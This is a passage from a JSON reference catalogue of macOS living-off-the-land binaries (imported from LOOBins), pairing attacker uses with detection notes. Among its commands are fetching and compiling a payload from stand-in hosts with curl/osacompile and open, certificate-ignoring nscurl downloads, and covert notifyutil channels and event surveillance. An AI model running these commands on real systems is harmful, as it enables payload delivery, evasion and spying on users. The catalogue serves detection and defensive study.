version, privacy permissions and installed components. Not lab tested here.", 3517 "detection": [ 3518 { 3519 "type": "No detections at time of publishing", 3520 "value": "No detections at time of publishing" 3521 } 3522 ], 3523 "references": [ 3524 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3525 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3526 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3527 "https://objective-see.org/blog/blog_0x25.html", 3528 "https://objective-see.org/blog/blog_0x26.html", 3529 "https://objective-see.org/blog/blog_0x6D.html", 3530 "https://objective-see.org/blog/blog_0x3C.html", 3531 "https://objective-see.org/blog/blog_0x6E.html" 3532 ] 3533 }, 3534 { 3535 "id": "loobins:networksetup:0365fc892ea9ebd8", 3536 "toolId": "loobins:networksetup", 3537 "toolName": "networksetup", 3538 "name": "Enable auto proxy state", 3539 "source": "LOOBins", 3540 "platform": [ 3541 "macOS" 3542 ], 3543 "capability": [], 3544 "nativeCategory": [ 3545 "Command and Control" 3546 ], 3547 "command": "networksetup -setautoproxystate \"Wi-Fi\" on", 3548 "description": "Use networksetup to enable the proxy auto-config", 3549 "mitre": [], 3550 "fullPath": [ 3551 "/usr/sbin/networksetup" 3552 ], 3553 "environment": [ 3554 "Local host" 3555 ], 3556 "availability": "Built in", 3557 "verification": "Upstream reference", 3558 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3559 "detection": [ 3560 { 3561 "type": "No detections at time of publishing", 3562 "value": "No detections at time of publishing" 3563 } 3564 ], 3565 "references": [ 3566 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", 3567 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 3568 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", 3569 "https://objective-see.org/blog/blog_0x25.html", 3570 "https://objective-see.org/blog/blog_0x26.html", 3571 "https://objective-see.org/blog/blog_0x6D.html", 3572 "https://objective-see.org/blog/blog_0x3C.html", 3573 "https://objective-see.org/blog/blog_0x6E.html" 3574 ] 3575 }, 3576 { 3577 "id": "loobins:notifyutil:a49f967a5200e4d3", 3578 "toolId": "loobins:notifyutil", 3579 "toolName": "notifyutil", 3580 "name": "Monitor system events for reconnaissance", 3581 "source": "LOOBins", 3582 "platform": [ 3583 "macOS" 3584 ], 3585 "capability": [ 3586 "Discovery", 3587 "Collection" 3588 ], 3589 "nativeCategory": [ 3590 "Discovery", 3591 "Collection" 3592 ], 3593 "command": "notifyutil -w com.apple.screenIsLocked", 3594 "description": "An attacker can register for system notification keys to detect when the user locks their screen, changes network state, or other system events without using more easily detected APIs. The following example monitors for screen lock events.", 3595 "mitre": [], 3596 "fullPath": [ 3597 "/usr/bin/notifyutil" 3598 ], 3599 "environment": [ 3600 "Local host" 3601 ], 3602 "availability": "Built in", 3603 "verification": "Upstream reference", 3604 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3605 "detection": [ 3606 { 3607 "type": "Monitor notifyutil execution with suspicious notification keys", 3608 "value": "Monitor notifyutil execution with suspicious notification keys" 3609 }, 3610 { 3611 "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", 3612 "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" 3613 }, 3614 { 3615 "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", 3616 "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" 3617 }, 3618 { 3619 "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", 3620 "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" 3621 } 3622 ], 3623 "references": [ 3624 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", 3625 "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", 3626 "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", 3627 "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" 3628 ] 3629 }, 3630 { 3631 "id": "loobins:notifyutil:891e0dc874fbdd11", 3632 "toolId": "loobins:notifyutil", 3633 "toolName": "notifyutil", 3634 "name": "Establish covert inter-process communication channel", 3635 "source": "LOOBins", 3636 "platform": [ 3637 "macOS" 3638 ], 3639 "capability": [ 3640 "Defense Evasion" 3641 ], 3642 "nativeCategory": [ 3643 "Command and Control", 3644 "Defense Evasion" 3645 ], 3646 "command": "# Sender process\nnotifyutil -p com.example.hidden.channel -s com.example.hidden.channel 1337\n\n# Receiver process in another terminal/process\nnotifyutil -1 com.example.hidden.channel -g com.example.hidden.channel", 3647 "description": "Threat actors can use Darwin notifications as a covert IPC mechanism to coordinate between malicious processes. By posting and monitoring custom notification keys with associated state values, malware components can exchange commands and data without using traditional IPC methods that may be monitored.", 3648 "mitre": [], 3649 "fullPath": [ 3650 "/usr/bin/notifyutil" 3651 ], 3652 "environment": [ 3653 "Local host" 3654 ], 3655 "availability": "Built in", 3656 "verification": "Upstream reference", 3657 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3658 "detection": [ 3659 { 3660 "type": "Monitor notifyutil execution with suspicious notification keys", 3661 "value": "Monitor notifyutil execution with suspicious notification keys" 3662 }, 3663 { 3664 "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", 3665 "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" 3666 }, 3667 { 3668 "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", 3669 "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" 3670 }, 3671 { 3672 "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", 3673 "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" 3674 } 3675 ], 3676 "references": [ 3677 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", 3678 "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", 3679 "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", 3680 "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" 3681 ] 3682 }, 3683 { 3684 "id": "loobins:notifyutil:45163e0090184fa4", 3685 "toolId": "loobins:notifyutil", 3686 "toolName": "notifyutil", 3687 "name": "Monitor network state changes for data exfiltration timing", 3688 "source": "LOOBins", 3689 "platform": [ 3690 "macOS" 3691 ], 3692 "capability": [ 3693 "Discovery", 3694 "Collection" 3695 ], 3696 "nativeCategory": [ 3697 "Discovery", 3698 "Collection" 3699 ], 3700 "command": "notifyutil -w com.apple.system.config.network_change", 3701 "description": "An attacker can monitor for network configuration changes to determine optimal timing for data exfiltration. This allows malware to detect when the system connects to networks and adjust behavior accordingly.", 3702 "mitre": [], 3703 "fullPath": [ 3704 "/usr/bin/notifyutil" 3705 ], 3706 "environment": [ 3707 "Local host" 3708 ], 3709 "availability": "Built in", 3710 "verification": "Upstream reference", 3711 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3712 "detection": [ 3713 { 3714 "type": "Monitor notifyutil execution with suspicious notification keys", 3715 "value": "Monitor notifyutil execution with suspicious notification keys" 3716 }, 3717 { 3718 "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", 3719 "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" 3720 }, 3721 { 3722 "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", 3723 "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" 3724 }, 3725 { 3726 "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", 3727 "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" 3728 } 3729 ], 3730 "references": [ 3731 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", 3732 "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", 3733 "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", 3734 "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" 3735 ] 3736 }, 3737 { 3738 "id": "loobins:notifyutil:687e08d3b386a66e", 3739 "toolId": "loobins:notifyutil", 3740 "toolName": "notifyutil", 3741 "name": "Monitor timezone changes for geolocation tracking", 3742 "source": "LOOBins", 3743 "platform": [ 3744 "macOS" 3745 ], 3746 "capability": [ 3747 "Collection", 3748 "Discovery" 3749 ], 3750 "nativeCategory": [ 3751 "Collection", 3752 "Discovery" 3753 ], 3754 "command": "notifyutil -w com.apple.system.timezone", 3755 "description": "Monitoring timezone change notifications can help an attacker track when a target device moves between geographic locations or when users travel, providing intelligence about the target's physical location and movement patterns.", 3756 "mitre": [], 3757 "fullPath": [ 3758 "/usr/bin/notifyutil" 3759 ], 3760 "environment": [ 3761 "Local host" 3762 ], 3763 "availability": "Built in", 3764 "verification": "Upstream reference", 3765 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3766 "detection": [ 3767 { 3768 "type": "Monitor notifyutil execution with suspicious notification keys", 3769 "value": "Monitor notifyutil execution with suspicious notification keys" 3770 }, 3771 { 3772 "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", 3773 "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" 3774 }, 3775 { 3776 "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", 3777 "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" 3778 }, 3779 { 3780 "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", 3781 "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" 3782 } 3783 ], 3784 "references": [ 3785 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", 3786 "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", 3787 "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", 3788 "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" 3789 ] 3790 }, 3791 { 3792 "id": "loobins:notifyutil:c44dbcefe0e67951", 3793 "toolId": "loobins:notifyutil", 3794 "toolName": "notifyutil", 3795 "name": "Monitor login/logout events for privilege escalation timing", 3796 "source": "LOOBins", 3797 "platform": [ 3798 "macOS" 3799 ], 3800 "capability": [ 3801 "Discovery", 3802 "Privilege Escalation" 3803 ], 3804 "nativeCategory": [ 3805 "Discovery", 3806 "Privilege Escalation" 3807 ], 3808 "command": "notifyutil -w com.apple.loginwindow.logout -w com.apple.springboard.attemptactivationend", 3809 "description": "By monitoring authentication-related notification keys, an attacker can detect login and logout events to time privilege escalation attempts or other malicious activities when defenses may be weakened during authentication transitions.", 3810 "mitre": [], 3811 "fullPath": [ 3812 "/usr/bin/notifyutil" 3813 ], 3814 "environment": [ 3815 "Local host" 3816 ], 3817 "availability": "Built in", 3818 "verification": "Upstream reference", 3819 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3820 "detection": [ 3821 { 3822 "type": "Monitor notifyutil execution with suspicious notification keys", 3823 "value": "Monitor notifyutil execution with suspicious notification keys" 3824 }, 3825 { 3826 "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", 3827 "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" 3828 }, 3829 { 3830 "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", 3831 "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" 3832 }, 3833 { 3834 "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", 3835 "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" 3836 } 3837 ], 3838 "references": [ 3839 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", 3840 "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", 3841 "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", 3842 "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" 3843 ] 3844 }, 3845 { 3846 "id": "loobins:notifyutil:1b0af23ae08ae744", 3847 "toolId": "loobins:notifyutil", 3848 "toolName": "notifyutil", 3849 "name": "Query system notification state values for reconnaissance", 3850 "source": "LOOBins", 3851 "platform": [ 3852 "macOS" 3853 ], 3854 "capability": [ 3855 "Discovery" 3856 ], 3857 "nativeCategory": [ 3858 "Discovery" 3859 ], 3860 "command": "notifyutil -g com.apple.system.timezone\nnotifyutil -g com.apple.loginwindow.logout\nnotifyutil -g com.apple.screenIsLocked", 3861 "description": "Threat actors can query state values of system notification keys to gather information about the current system configuration without executing more suspicious commands.", 3862 "mitre": [], 3863 "fullPath": [ 3864 "/usr/bin/notifyutil" 3865 ], 3866 "environment": [ 3867 "Local host" 3868 ], 3869 "availability": "Built in", 3870 "verification": "Upstream reference", 3871 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3872 "detection": [ 3873 { 3874 "type": "Monitor notifyutil execution with suspicious notification keys", 3875 "value": "Monitor notifyutil execution with suspicious notification keys" 3876 }, 3877 { 3878 "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", 3879 "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" 3880 }, 3881 { 3882 "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", 3883 "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" 3884 }, 3885 { 3886 "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", 3887 "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" 3888 } 3889 ], 3890 "references": [ 3891 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", 3892 "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", 3893 "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", 3894 "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" 3895 ] 3896 }, 3897 { 3898 "id": "loobins:nscurl:5b4e238d88fa7cf3", 3899 "toolId": "loobins:nscurl", 3900 "toolName": "nscurl", 3901 "name": "Download file", 3902 "source": "LOOBins", 3903 "platform": [ 3904 "macOS" 3905 ], 3906 "capability": [ 3907 "Defense Evasion" 3908 ], 3909 "nativeCategory": [ 3910 "Defense Evasion", 3911 "Command and Control" 3912 ], 3913 "command": "nscurl -k https://google.com -o /private/tmp/google", 3914 "description": "Download file and ignore cert checking", 3915 "mitre": [], 3916 "fullPath": [ 3917 "/usr/bin/nscurl" 3918 ], 3919 "environment": [ 3920 "Local host" 3921 ], 3922 "availability": "Built in", 3923 "verification": "Upstream reference", 3924 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3925 "detection": [ 3926 { 3927 "type": "Jamf Protect: Detect all curl and nscurl activity", 3928 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/all_curl_activity" 3929 }, 3930 { 3931 "type": "Jamf Protect: Detect file downloads using the insecure argument for curl and nscurl", 3932 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/file_download_curl_insecure" 3933 }, 3934 { 3935 "type": "Sigma: File Download Via Nscurl - MacOS", 3936 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" 3937 } 3938 ], 3939 "references": [ 3940 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml", 3941 "https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl", 3942 "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos" 3943 ] 3944 }, 3945 { 3946 "id": "loobins:nscurl:ee54398ef9eb9eff", 3947 "toolId": "loobins:nscurl", 3948 "toolName": "nscurl", 3949 "name": "Download file", 3950 "source": "LOOBins", 3951 "platform": [ 3952 "macOS" 3953 ], 3954 "capability": [ 3955 "Defense Evasion" 3956 ], 3957 "nativeCategory": [ 3958 "Defense Evasion", 3959 "Command and Control" 3960 ], 3961 "command": "nscurl https://google.com -dl", 3962 "description": "Download file to the Downloads directory using -dl", 3963 "mitre": [], 3964 "fullPath": [ 3965 "/usr/bin/nscurl" 3966 ], 3967 "environment": [ 3968 "Local host" 3969 ], 3970 "availability": "Built in", 3971 "verification": "Upstream reference", 3972 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 3973 "detection": [ 3974 { 3975 "type": "Jamf Protect: Detect all curl and nscurl activity", 3976 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/all_curl_activity" 3977 }, 3978 { 3979 "type": "Jamf Protect: Detect file downloads using the insecure argument for curl and nscurl", 3980 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/file_download_curl_insecure" 3981 }, 3982 { 3983 "type": "Sigma: File Download Via Nscurl - MacOS", 3984 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" 3985 } 3986 ], 3987 "references": [ 3988 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml", 3989 "https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl", 3990 "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos" 3991 ] 3992 }, 3993 { 3994 "id": "loobins:nscurl:5e3b292edcfd8e16", 3995 "toolId": "loobins:nscurl", 3996 "toolName": "nscurl", 3997 "name": "Download file", 3998 "source": "LOOBins", 3999 "platform": [ 4000 "macOS" 4001 ], 4002 "capability": [ 4003 "Defense Evasion" 4004 ], 4005 "nativeCategory": [ 4006 "Defense Evasion", 4007 "Command and Control" 4008 ], 4009 "command": "nscurl https://google.com -dir /private/tmp/google", 4010 "description": "Download file to a designated directory using -dir", 4011 "mitre": [], 4012 "fullPath": [ 4013 "/usr/bin/nscurl" 4014 ], 4015 "environment": [ 4016 "Local host" 4017 ], 4018 "availability": "Built in", 4019 "verification": "Upstream reference", 4020 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4021 "detection": [ 4022 { 4023 "type": "Jamf Protect: Detect all curl and nscurl activity", 4024 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/all_curl_activity" 4025 }, 4026 { 4027 "type": "Jamf Protect: Detect file downloads using the insecure argument for curl and nscurl", 4028 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/file_download_curl_insecure" 4029 }, 4030 { 4031 "type": "Sigma: File Download Via Nscurl - MacOS", 4032 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" 4033 } 4034 ], 4035 "references": [ 4036 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml", 4037 "https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl", 4038 "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos" 4039 ] 4040 }, 4041 { 4042 "id": "loobins:nvram:0d1e2b7144728348", 4043 "toolId": "loobins:nvram", 4044 "toolName": "nvram", 4045 "name": "Get nvram variables", 4046 "source": "LOOBins", 4047 "platform": [ 4048 "macOS" 4049 ], 4050 "capability": [ 4051 "Discovery" 4052 ], 4053 "nativeCategory": [ 4054 "Discovery" 4055 ], 4056 "command": "nvram -p", 4057 "description": "The -p option prints all the nvram variables that contain some potentially sensitive information like WiFi SSIDs and Bluetooth devices.", 4058 "mitre": [], 4059 "fullPath": [ 4060 "/usr/sbin/nvram" 4061 ], 4062 "environment": [ 4063 "Local host" 4064 ], 4065 "availability": "Built in", 4066 "verification": "Upstream reference", 4067 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4068 "detection": [ 4069 { 4070 "type": "No detections at time of publishing.", 4071 "value": "No detections at time of publishing." 4072 } 4073 ], 4074 "references": [ 4075 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nvram.yml", 4076 "https://ss64.com/osx/nvram.html" 4077 ] 4078 }, 4079 { 4080 "id": "loobins:odutil:1a80777abd38d15d", 4081 "toolId": "loobins:odutil", 4082 "toolName": "odutil", 4083 "name": "Listing the available node names", 4084 "source": "LOOBins", 4085 "platform": [ 4086 "macOS" 4087 ], 4088 "capability": [ 4089 "Discovery" 4090 ], 4091 "nativeCategory": [ 4092 "Discovery" 4093 ], 4094 "command": "odutil show nodenames", 4095 "description": "List all available node names", 4096 "mitre": [], 4097 "fullPath": [ 4098 "/usr/bin/odutil" 4099 ], 4100 "environment": [ 4101 "Local host" 4102 ], 4103 "availability": "Built in", 4104 "verification": "Upstream reference", 4105 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4106 "detection": [ 4107 { 4108 "type": "No detections at time of publishing", 4109 "value": "No detections at time of publishing" 4110 } 4111 ], 4112 "references": [ 4113 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml", 4114 "https://macosbin.com/bin/odutil", 4115 "https://www.unix.com/man-page/osx/1/odutil/" 4116 ] 4117 }, 4118 { 4119 "id": "loobins:odutil:c97f832e924791c8", 4120 "toolId": "loobins:odutil", 4121 "toolName": "odutil", 4122 "name": "Retrieves active session", 4123 "source": "LOOBins", 4124 "platform": [ 4125 "macOS" 4126 ], 4127 "capability": [ 4128 "Discovery" 4129 ], 4130 "nativeCategory": [ 4131 "Discovery" 4132 ], 4133 "command": "odutil show sessions", 4134 "description": "Retrieves all active sessions", 4135 "mitre": [], 4136 "fullPath": [ 4137 "/usr/bin/odutil" 4138 ], 4139 "environment": [ 4140 "Local host" 4141 ], 4142 "availability": "Built in", 4143 "verification": "Upstream reference", 4144 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4145 "detection": [ 4146 { 4147 "type": "No detections at time of publishing", 4148 "value": "No detections at time of publishing" 4149 } 4150 ], 4151 "references": [ 4152 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml", 4153 "https://macosbin.com/bin/odutil", 4154 "https://www.unix.com/man-page/osx/1/odutil/" 4155 ] 4156 }, 4157 { 4158 "id": "loobins:odutil:27e596cc427f4d65", 4159 "toolId": "loobins:odutil", 4160 "toolName": "odutil", 4161 "name": "Retrieves \"Default search policy\"", 4162 "source": "LOOBins", 4163 "platform": [ 4164 "macOS" 4165 ], 4166 "capability": [ 4167 "Discovery" 4168 ], 4169 "nativeCategory": [ 4170 "Discovery" 4171 ], 4172 "command": "odutil show configuration /Search", 4173 "description": "Retrieves the configuration of \"Default search policy\"", 4174 "mitre": [], 4175 "fullPath": [ 4176 "/usr/bin/odutil" 4177 ], 4178 "environment": [ 4179 "Local host" 4180 ], 4181 "availability": "Built in", 4182 "verification": "Upstream reference", 4183 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4184 "detection": [ 4185 { 4186 "type": "No detections at time of publishing", 4187 "value": "No detections at time of publishing" 4188 } 4189 ], 4190 "references": [ 4191 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml", 4192 "https://macosbin.com/bin/odutil", 4193 "https://www.unix.com/man-page/osx/1/odutil/" 4194 ] 4195 }, 4196 { 4197 "id": "loobins:odutil:076a878e325ba974", 4198 "toolId": "loobins:odutil", 4199 "toolName": "odutil", 4200 "name": "Retrieves \"Contact search policy\"", 4201 "source": "LOOBins", 4202 "platform": [ 4203 "macOS" 4204 ], 4205 "capability": [ 4206 "Discovery" 4207 ], 4208 "nativeCategory": [ 4209 "Discovery" 4210 ], 4211 "command": "odutil show configuration /Contacts", 4212 "description": "Retrieves the configuration of \"Contact search policy\"", 4213 "mitre": [], 4214 "fullPath": [ 4215 "/usr/bin/odutil" 4216 ], 4217 "environment": [ 4218 "Local host" 4219 ], 4220 "availability": "Built in", 4221 "verification": "Upstream reference", 4222 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4223 "detection": [ 4224 { 4225 "type": "No detections at time of publishing", 4226 "value": "No detections at time of publishing" 4227 } 4228 ], 4229 "references": [ 4230 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml", 4231 "https://macosbin.com/bin/odutil", 4232 "https://www.unix.com/man-page/osx/1/odutil/" 4233 ] 4234 }, 4235 { 4236 "id": "loobins:open:9d6e5bf92253e8b1", 4237 "toolId": "loobins:open", 4238 "toolName": "open", 4239 "name": "Open a malicious file", 4240 "source": "LOOBins", 4241 "platform": [ 4242 "macOS" 4243 ], 4244 "capability": [ 4245 "Execution" 4246 ], 4247 "nativeCategory": [ 4248 "Execution" 4249 ], 4250 "command": "open Malicious.app", 4251 "description": "The open command can be used to open a malicious macOS app from the terminal.", 4252 "mitre": [], 4253 "fullPath": [ 4254 "/usr/bin/open" 4255 ], 4256 "environment": [ 4257 "Local host" 4258 ], 4259 "availability": "Built in", 4260 "verification": "Upstream reference", 4261 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4262 "detection": [ 4263 { 4264 "type": "No detections at time of publishing", 4265 "value": "No detections at time of publishing" 4266 } 4267 ], 4268 "references": [ 4269 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/open.yml", 4270 "https://scriptingosx.com/2017/02/the-macos-open-command/" 4271 ] 4272 }, 4273 { 4274 "id": "loobins:open:baa2cd4b26d3da10", 4275 "toolId": "loobins:open", 4276 "toolName": "open", 4277 "name": "Download a malicious file", 4278 "source": "LOOBins", 4279 "platform": [ 4280 "macOS" 4281 ], 4282 "capability": [ 4283 "Execution" 4284 ], 4285 "nativeCategory": [ 4286 "Execution" 4287 ], 4288 "command": "open -g https://mypayload.io/payload.zip; sleep 3; killall Safari", 4289 "description": "The following command downloads the payload.zip file in the default browser (Safari) and then kills it.", 4290 "mitre": [], 4291 "fullPath": [ 4292 "/usr/bin/open" 4293 ], 4294 "environment": [ 4295 "Local host" 4296 ], 4297 "availability": "Built in", 4298 "verification": "Upstream reference", 4299 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4300 "detection": [ 4301 { 4302 "type": "No detections at time of publishing", 4303 "value": "No detections at time of publishing" 4304 } 4305 ], 4306 "references": [ 4307 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/open.yml", 4308 "https://scriptingosx.com/2017/02/the-macos-open-command/" 4309 ] 4310 }, 4311 { 4312 "id": "loobins:osacompile:62c7b7fda3724111", 4313 "toolId": "loobins:osacompile", 4314 "toolName": "osacompile", 4315 "name": "Download and compile a payload", 4316 "source": "LOOBins", 4317 "platform": [ 4318 "macOS" 4319 ], 4320 "capability": [], 4321 "nativeCategory": [ 4322 "Command and Control", 4323 "Resource Development" 4324 ], 4325 "command": "curl https://getpayload.com/payload_code.apple_script && osacompile -x -e payload_code.apple_script -o payload.app", 4326 "description": "The following command downloads an applescript payload from getpayload.com and compiles it into an app.", 4327 "mitre": [], 4328 "fullPath": [ 4329 "/usr/bin/osacompile" 4330 ], 4331 "environment": [ 4332 "Local host" 4333 ], 4334 "availability": "Built in", 4335 "verification": "Upstream reference", 4336 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 4337 "detection": [ 4338 { 4339 "type": "Sigma: In-Memory Download And Compile Of Payloads (experimental/pending)", 4340 "value": "https://github.com/SigmaHQ/sigma/pull/4127/commits/f4b0264a83e5f47473029e26dc0879fb196a7d07" 4341 } 4342 ], 4343 "references": [ 4344 